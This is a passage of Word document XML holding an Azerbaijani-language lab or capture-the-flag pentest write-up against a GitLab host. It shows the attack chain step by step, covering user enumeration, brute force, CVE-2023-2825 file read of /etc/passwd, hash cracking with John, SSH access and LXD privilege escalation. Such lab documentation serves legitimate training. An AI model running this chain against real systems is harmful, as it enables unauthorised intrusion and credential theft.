        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Nmap və brauzer yoxlaması nəticəsində 443 üzərində GitLab tətbiqi aşkar edildi. Autentifikasiyasız şəkildə repository görünüşü yoxlandı və login/registration səthi müşahidə edildi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Niyə bu addım seçildi: Bu mərhələdə məqsəd tətbiqin nə olduğunu, autentifikasiyasız görünən hissələrinin nə qədər məlumat verdiyini və hücumun haradan başlanacağını müəyyən etmək idi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nmap -sC -sV 192.168.31.232</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="4046220"/>
            <wp:docPr id="38" name="Picture 38"/>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394960" cy="4046220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GitLab login səhifəsi. Bu görüntü tətbiqin tipini və hücumun autentifikasiya səthinə fokuslanmalı olduğunu göstərir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2225586"/>
            <wp:docPr id="39" name="Picture 39"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (1).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2225586"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Autentifikasiyasız repository görünüşü. Buradakı məqsəd giriş etmədən həssas məzmunun açıq qalıb-qalmadığını yoxlamaq idi.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.2 İstifadəçi enumerasiyası və brute force</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Qeydiyyat səhifəsində username availability yoxlaması təhlil edildi və /users/&lt;username&gt;/exists endpoint-i təsdiqləndi. ffuf / curl üsulu ilə istifadəçilər toplandı. robots.txt içində və digər açıq səthlərdə görünən sözlər parol siyahısı kimi istifadə edildi və nəticədə root hesabı üçün işlək credential əldə olundu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Niyə bu addım seçildi: GitLab daxilinə girmədən versiya və daxili məlumat toplamaq çətin idi. Buna görə əvvəlcə mövcud istifadəçiləri tapmaq, sonra isə zəif parol sınağı aparmaq lazım gəldi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -k https://&lt;target&gt;/users/&lt;user&gt;/exists</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ffuf -u https://&lt;target&gt;/users/FUZZ/exists -w users.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msfconsole auxiliary/scanner/http/gitlab_login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="1992943"/>
            <wp:docPr id="40" name="Picture 40"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (2).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1992943"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Qeydiyyat səhifəsində username yoxlaması. Məqsəd tətbiqin istifadəçi mövcudluğunu frontend-dən necə təsdiqlədiyini anlamaq idi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="1563176"/>
            <wp:docPr id="41" name="Picture 41"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (3).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1563176"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Burp/curl ilə istifadəçi mövcudluğunu yoxlayan sorğu. Bu endpoint sayəsində mövcud istifadəçi adlarını mass şəkildə toplamaq mümkün oldu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="4823255"/>
            <wp:docPr id="42" name="Picture 42"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (4).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="4823255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>robots.txt və istifadəçi siyahısı üzərindən toplanmış namizədlər. Bu məlumat sonradan brute force üçün input rolunu oynadı.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.3 GitLab versiyasının təyini və arbitrary file read</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GitLab daxilində /help səhifəsindən versiyanın 16.0.0-ee olduğu görüldü. Daha sonra CVE-2023-2825 arbitrary file read zəifliyi tətbiq olundu və /etc/passwd kimi sistem faylları oxundu. Nəticədə plumber istifadəçisinə aid yescrypt hash müəyyən edildi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Niyə bu addım seçildi: Autentifikasiya əldə edildikdən sonra əsas məqsəd tətbiqin versiyasını müəyyən etmək və uyğun public zəiflik axtarmaq idi. Bu yanaşma ən sürətli exploit zəncirini qurmağa imkan verir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GitLab /help</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CVE-2023-2825 exploit script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="1388104"/>
            <wp:docPr id="43" name="Picture 43"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (5).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1388104"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/help səhifəsində GitLab versiyası. Bu məlumat uyğun CVE seçmək üçün əsas sübut idi.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.4 plumber hesabına keçid və user bayrağı</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>yescrypt hash John the Ripper ilə qırıldı və plumber hesabının parolu əldə edildi. Sonra SSH ilə sistemə giriş edildi, istifadəçi mühiti yoxlandı və user1.txt bayrağı götürüldü.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Niyə bu addım seçildi: Arbitrary file read nəticəsində əldə edilən hash yalnız o zaman dəyər qazanır ki, real parol alınsın və sistemə interaktiv giriş açılsın. Bu addım server daxilinə keçmək üçün lazımdır.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>john plumber.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ssh plumber@192.168.31.232</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.5 LXD üzərindən root escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Niyə bu addım seçildi: Sistemdə plumber istifadəçisinin lxd qrupunda olması ən güclü escalation yolunu verirdi. Bu hüquq privileged container yaratmağa və host fayl sistemini mount etməyə imkan yaradır.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>./lxd.sh -f alpine-v3.13-x86_64-20210218_0139.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cd /mnt/root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="1777483"/>
            <wp:docPr id="44" name="Picture 44"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (6).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1777483"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.6 Alternativ eskalasiya yolu qeydi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>adm qrup üzvlüyü və SUID pax binarisi də potensial alternativ yol idi. pax vasitəsilə müəyyən faylların oxunması mümkün olduğundan, root.txt kimi həssas fayllar tam root shell almadan da əldə oluna bilərdi. Buna baxmayaraq əsas və təmiz marşrut LXD escalation olaraq saxlanıldı.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Niyə bu addım seçildi: Yekun hesabatda alternativ yolları qeyd etmək vacibdir; bu, yalnız bir marşrutun işlədiyini yox, sistemin birdən çox nöqtədən risk daşıdığını göstərir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pax -wf &lt;file&gt; &lt;target&gt;  # GTFOBins file-read yanaşması</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nəticə</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hər üç challenge üzrə ilkin giriş, daxili enumerasiya, privilege escalation və yekun sübut addımları uğurla sənədləşdirildi. Bu hesabatdakı addımlar real pentest metodologiyasına uyğun şəkildə ardıcıl, sübut əsaslı və texniki dildə təqdim olundu.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616">
      <w:footerReference w:type="default" r:id="rId9"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1134" w:right="1247" w:bottom="96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1" w:color="D0D5DD"/>
      </w:pBdr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> | Page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